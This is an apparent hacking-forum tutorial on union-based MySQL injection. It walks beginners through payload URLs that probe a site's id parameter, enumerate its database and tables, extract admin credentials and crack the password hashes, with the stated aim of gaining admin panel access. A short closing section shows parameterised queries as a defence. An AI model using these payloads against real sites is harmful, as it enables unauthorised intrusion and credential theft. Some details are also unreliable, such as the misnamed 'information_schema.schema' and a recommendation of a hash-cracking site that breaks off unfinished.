Closed [projectshield] basic mysql injection (for starters)

Ace Valentine, Honorary Poster (joined Jun 7, 2018)

Today, let's talk about SQL Injection. I suppose most of you are beginners to SQL Injection, so let's do a quick review to see what an SQL Injection really is.

What Is SQL Injection?

An SQL Injection is basically a code injection that exploits an area of a site that is vulnerable to it. The injected code exploits the database to get information such as emails, usernames, passwords, etc.
In this tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information so that it will not be compromised so easily.

Exploiting the Database

Alright! Future hackers, are you ready to do SQL Injection? Okay, so first we need to test our site to see if it's vulnerable to SQL Injection. Example:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1

Our site's URL HAS to have a parameter with an '=' in it (like id=1 above). Otherwise we cannot use SQL Injection to exploit the database this way. So after the 1 (in the id) put an ' (apostrophe) so that it looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1'

If the page errors, wow! There's a big chance the site is vulnerable. But if it just refreshes normally, move on.

Finding the number of columns

Now we know our site is vulnerable to SQL Injection, so we want to start getting the info out of the database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. We don't know how many columns there are yet, so we need that first. To find the number of columns we use a command called 'order by'. This command will help us determine how many columns there are. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

Now if the site just refreshed to its normal state, that's good: we didn't get an error, so we keep increasing the number until we do get an error.

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

URGENT
The two hyphens (--) are critical for executing the command. They tell the site that it's a command, and it will execute. So we NEED those at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

A couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers are the columns that are vulnerable to SQL Injection, so those are the columns we need to execute our commands in. Let's say that column 2 appeared on the page. We will be executing commands in column 2.

URGENT
You HAVE to have the - after the =. That is critical.

Determining the Version of the MySQL Database

Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.

So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

Now it should display the Version on the page. It should look something like this:

Code:
5.1.47-community-log

The exact numbers don't matter, as long as the version is 5 or higher.

Finding the name of the Database

The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

Code:
http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schema--

Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would preferably be:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

Now you will be shown the database name. Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contain the information. That's why we need to view them, so we can get the information we seek.

The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the Tables in the Database will be displayed.

Viewing the Tables' information

We will most likely be given many tables. It is up to you to decide which one contains the valuable information.

So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password, is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex.

To do that, I recommend using an online text-to-hex converter.

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

Displaying the Contents

There will still be columns inside the table you've chosen. So you need to get the information out of them, and that will usually mean goodbye tables, and HELLO Admin Panel access.

Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

Sometimes you will get a password that isn't readable, which means the password is encrypted/hashed.

Cracking Hashes

What is a hash, you may be asking? A hash is basically a scrambled, one-way version of a password, or of any other "hidden" information that could be used against the person and/or site. People hash their passwords so that if there is a security breach, it will be hard to get the true password of the user or the Admin Panel.

There are many types of hashes, but the most popular to this day is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to hash other candidate passwords and compare the results to the hash; there is no official way to decrypt it in any other way.

The best site you'll find on decrypting a Hash, would definitely be

How to Prevent Against It

Make sure that the code you use to fetch data from the database does not look like this:

Code:
'select * from users where username=' & usernameInput & ' and password=' & passwordInput

You must use parameters instead:

Example in PHP

Code:
$username = 'gwapo';
// Prepare the query with a ? placeholder instead of pasting the input into the SQL string
$stmt = $dbConnection->prepare('SELECT * FROM users WHERE username = ?');
// Bind the user-supplied value as a string ('s'); the driver sends it as data, never as SQL
$stmt->bind_param('s', $username);
$stmt->execute();
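To show what the two snippets above actually do with the inputs used earlier in this tutorial (the lone apostrophe and the `-1 union select 1,2,3,4--` payload), here is an added example that is not part of the original post. It uses Python's built-in sqlite3 module in place of PHP and MySQL, with a constructed in-memory `events` table; the table, its rows and the function names are my own for the demonstration. The vulnerable function concatenates the `id` value into the SQL text the way the first snippet does; the safe function binds it as a parameter the way the PHP `prepare`/`bind_param` code does.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample database: one events table, one row. Not from the post.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER, title TEXT, body TEXT, day TEXT)")
    conn.execute("INSERT INTO events VALUES (1, 'Launch', 'Details', '2018-06-07')")
    return conn


def event_vulnerable(conn: sqlite3.Connection, event_id: str) -> list:
    # String concatenation, as in the page's "don't do this" snippet: whatever
    # arrives in ?id= becomes part of the SQL statement itself.
    sql = "SELECT id, title, body, day FROM events WHERE id=" + event_id
    return conn.execute(sql).fetchall()


def event_safe(conn: sqlite3.Connection, event_id: str) -> list:
    # Placeholder plus bound parameter, the sqlite3 equivalent of the PHP
    # prepare()/bind_param() above: the value is sent as data and cannot
    # change the structure of the query.
    sql = "SELECT id, title, body, day FROM events WHERE id=?"
    return conn.execute(sql, (event_id,)).fetchall()


def attempt(fetch, value: str) -> tuple:
    """Run one fetch against a fresh database and report either the rows or
    the database error. The error case is what the apostrophe test in this
    tutorial observes from the outside."""
    conn = make_db()
    try:
        return ("rows", fetch(conn, value))
    except sqlite3.OperationalError as err:
        return ("error", str(err))
    finally:
        conn.close()


if __name__ == "__main__":
    # The same three inputs from the tutorial, sent to both versions.
    for value in ("1", "1'", "-1 union select 1,2,3,4--"):
        print(f"id={value!r}")
        print("  concatenated :", attempt(event_vulnerable, value))
        print("  parameterised:", attempt(event_safe, value))
```

With concatenation, `1'` produces a database error (the "vulnerable" sign from the first section) and the union payload returns a row of `1,2,3,4` that never existed in the table. With the bound parameter, both inputs are simply compared against the `id` column as text, match nothing, and return an empty result; only the honest `1` returns the event. There is no input the caller can supply that turns the parameter into SQL.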


Epilogue

It took me a while to copy this from the original source haha. I hope you all understood how to do it and how to defend your applications against this kind of attack.

Just message me here if you have questions, I'm too lazy to edit haha.

SQL Injection IS ILLEGAL. So whatever you do with it is your responsibility, not mine. You can get in lots of trouble for an SQL Injection.

You want more adventures? Follow me!

Good luck! And have fun securing your codes!